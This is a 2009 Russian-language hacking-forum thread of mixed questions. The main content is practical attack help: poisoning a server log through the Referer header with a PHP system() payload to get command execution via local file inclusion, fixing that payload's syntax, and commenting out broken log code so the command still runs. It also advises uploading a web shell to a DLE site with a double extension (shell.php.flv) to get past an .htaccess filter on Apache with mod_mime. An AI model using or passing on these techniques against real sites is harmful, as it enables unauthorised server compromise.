12.08.2009, 04:51
|
|
Познающий
Регистрация: 09.02.2009
Сообщений: 70
С нами:
9078977
Репутация:
34
|
|
нашел файл логов через php incl,в reffer вставил
http://www.site<?php system(ls); ?>site.com/index.php
вылазит ошибка Parse error: syntax error, unexpected T_STRING что не так?
|
|
|
12.08.2009, 04:53
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
С нами:
9466141
Репутация:
74
|
|
http://www.site<?php system('ls'); ?>site.com/index.php
вроде так должно быть
|
|
|
|
12.08.2009, 05:04
|
|
Познающий
Регистрация: 09.02.2009
Сообщений: 70
С нами:
9078977
Репутация:
34
|
|
испортил логи терь над ждать пока ошибка исчезнет)
|
|
|
|
12.08.2009, 13:42
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Сообщение от RazyKK
испортил логи терь над ждать пока ошибка исчезнет)
Можно попробовать закомментировать оставшуюся часть, к примеру на локале у меня такое пашет:
PHP код:
<?php
system('dir');
die();/*
<?php
system(;
?>
Ругается конечно, но работает.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 12.08.2009 в 13:44..
|
|
|
|
12.08.2009, 13:06
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 53
С нами:
9199661
Репутация:
10
|
|
заливка шела в дле
Есть доступ к dle админке, версия 7.3.
Включил возможность добавлять файлы, но к новости так прикрепить и не смог.
Да и если бы получилось, то насколько я понимаю и проверил, папка /uploads/files/ защищена .htaccess:
PHP код:
<FilesMatch ".*">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$">
Order deny,allow
Allow from all
</FilesMatch>
Какие есть способы залить шел? |
|
|
|
12.08.2009, 13:25
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами:
9362947
Репутация:
1196
|
|
Сообщение от u36a
Какие есть способы залить шел?
пробуй shell.php.flv
|
|
|
|
12.08.2009, 14:25
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 53
С нами:
9199661
Репутация:
10
|
|
Сообщение от L I G A
пробуй shell.php.flv
А что это даст, он же не будет интерпретироваться как пхп..
|
|
|
|
12.08.2009, 13:08
|
|
Banned
Регистрация: 08.08.2009
Сообщений: 46
С нами:
8820848
Репутация:
67
|
|
Тут вчера сидел в нете и решил перевести WME в яндекс.Деньги
нашол обменник
и выбрал случайно не WME а WMU, написал 10 и оплатил, ток потом дошло что я не ту валюту выбрал и кошелька у мну такого нет, при обновлении страницы у мну на яндексе светились деньги, а в WM появился кошелек WMU с 0 денежных средств
Кто нить вкурсах что это было?
|
|
|
|
12.08.2009, 14:47
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
А что это даст, он же не будет интерпретироваться как пхп..
Если апач с mod_mime, то будет
|
|
|
|
12.08.2009, 14:59
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 53
С нами:
9199661
Репутация:
10
|
|
Сообщение от [Raz0r]
Если апач с mod_mime, то будет
хорошо, спасибо, попробую.. просто как добавлять новости с файлом я тоже найти не могу..
Да и ещё там будет номер из цифр пяти-шести перед файлом, его тоже узнать как-то надо. =)
Ладно, буду пробывать, спасибо за эту инфу.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1447203){kind=avatar}
Похожие темы
Комбинированный вид
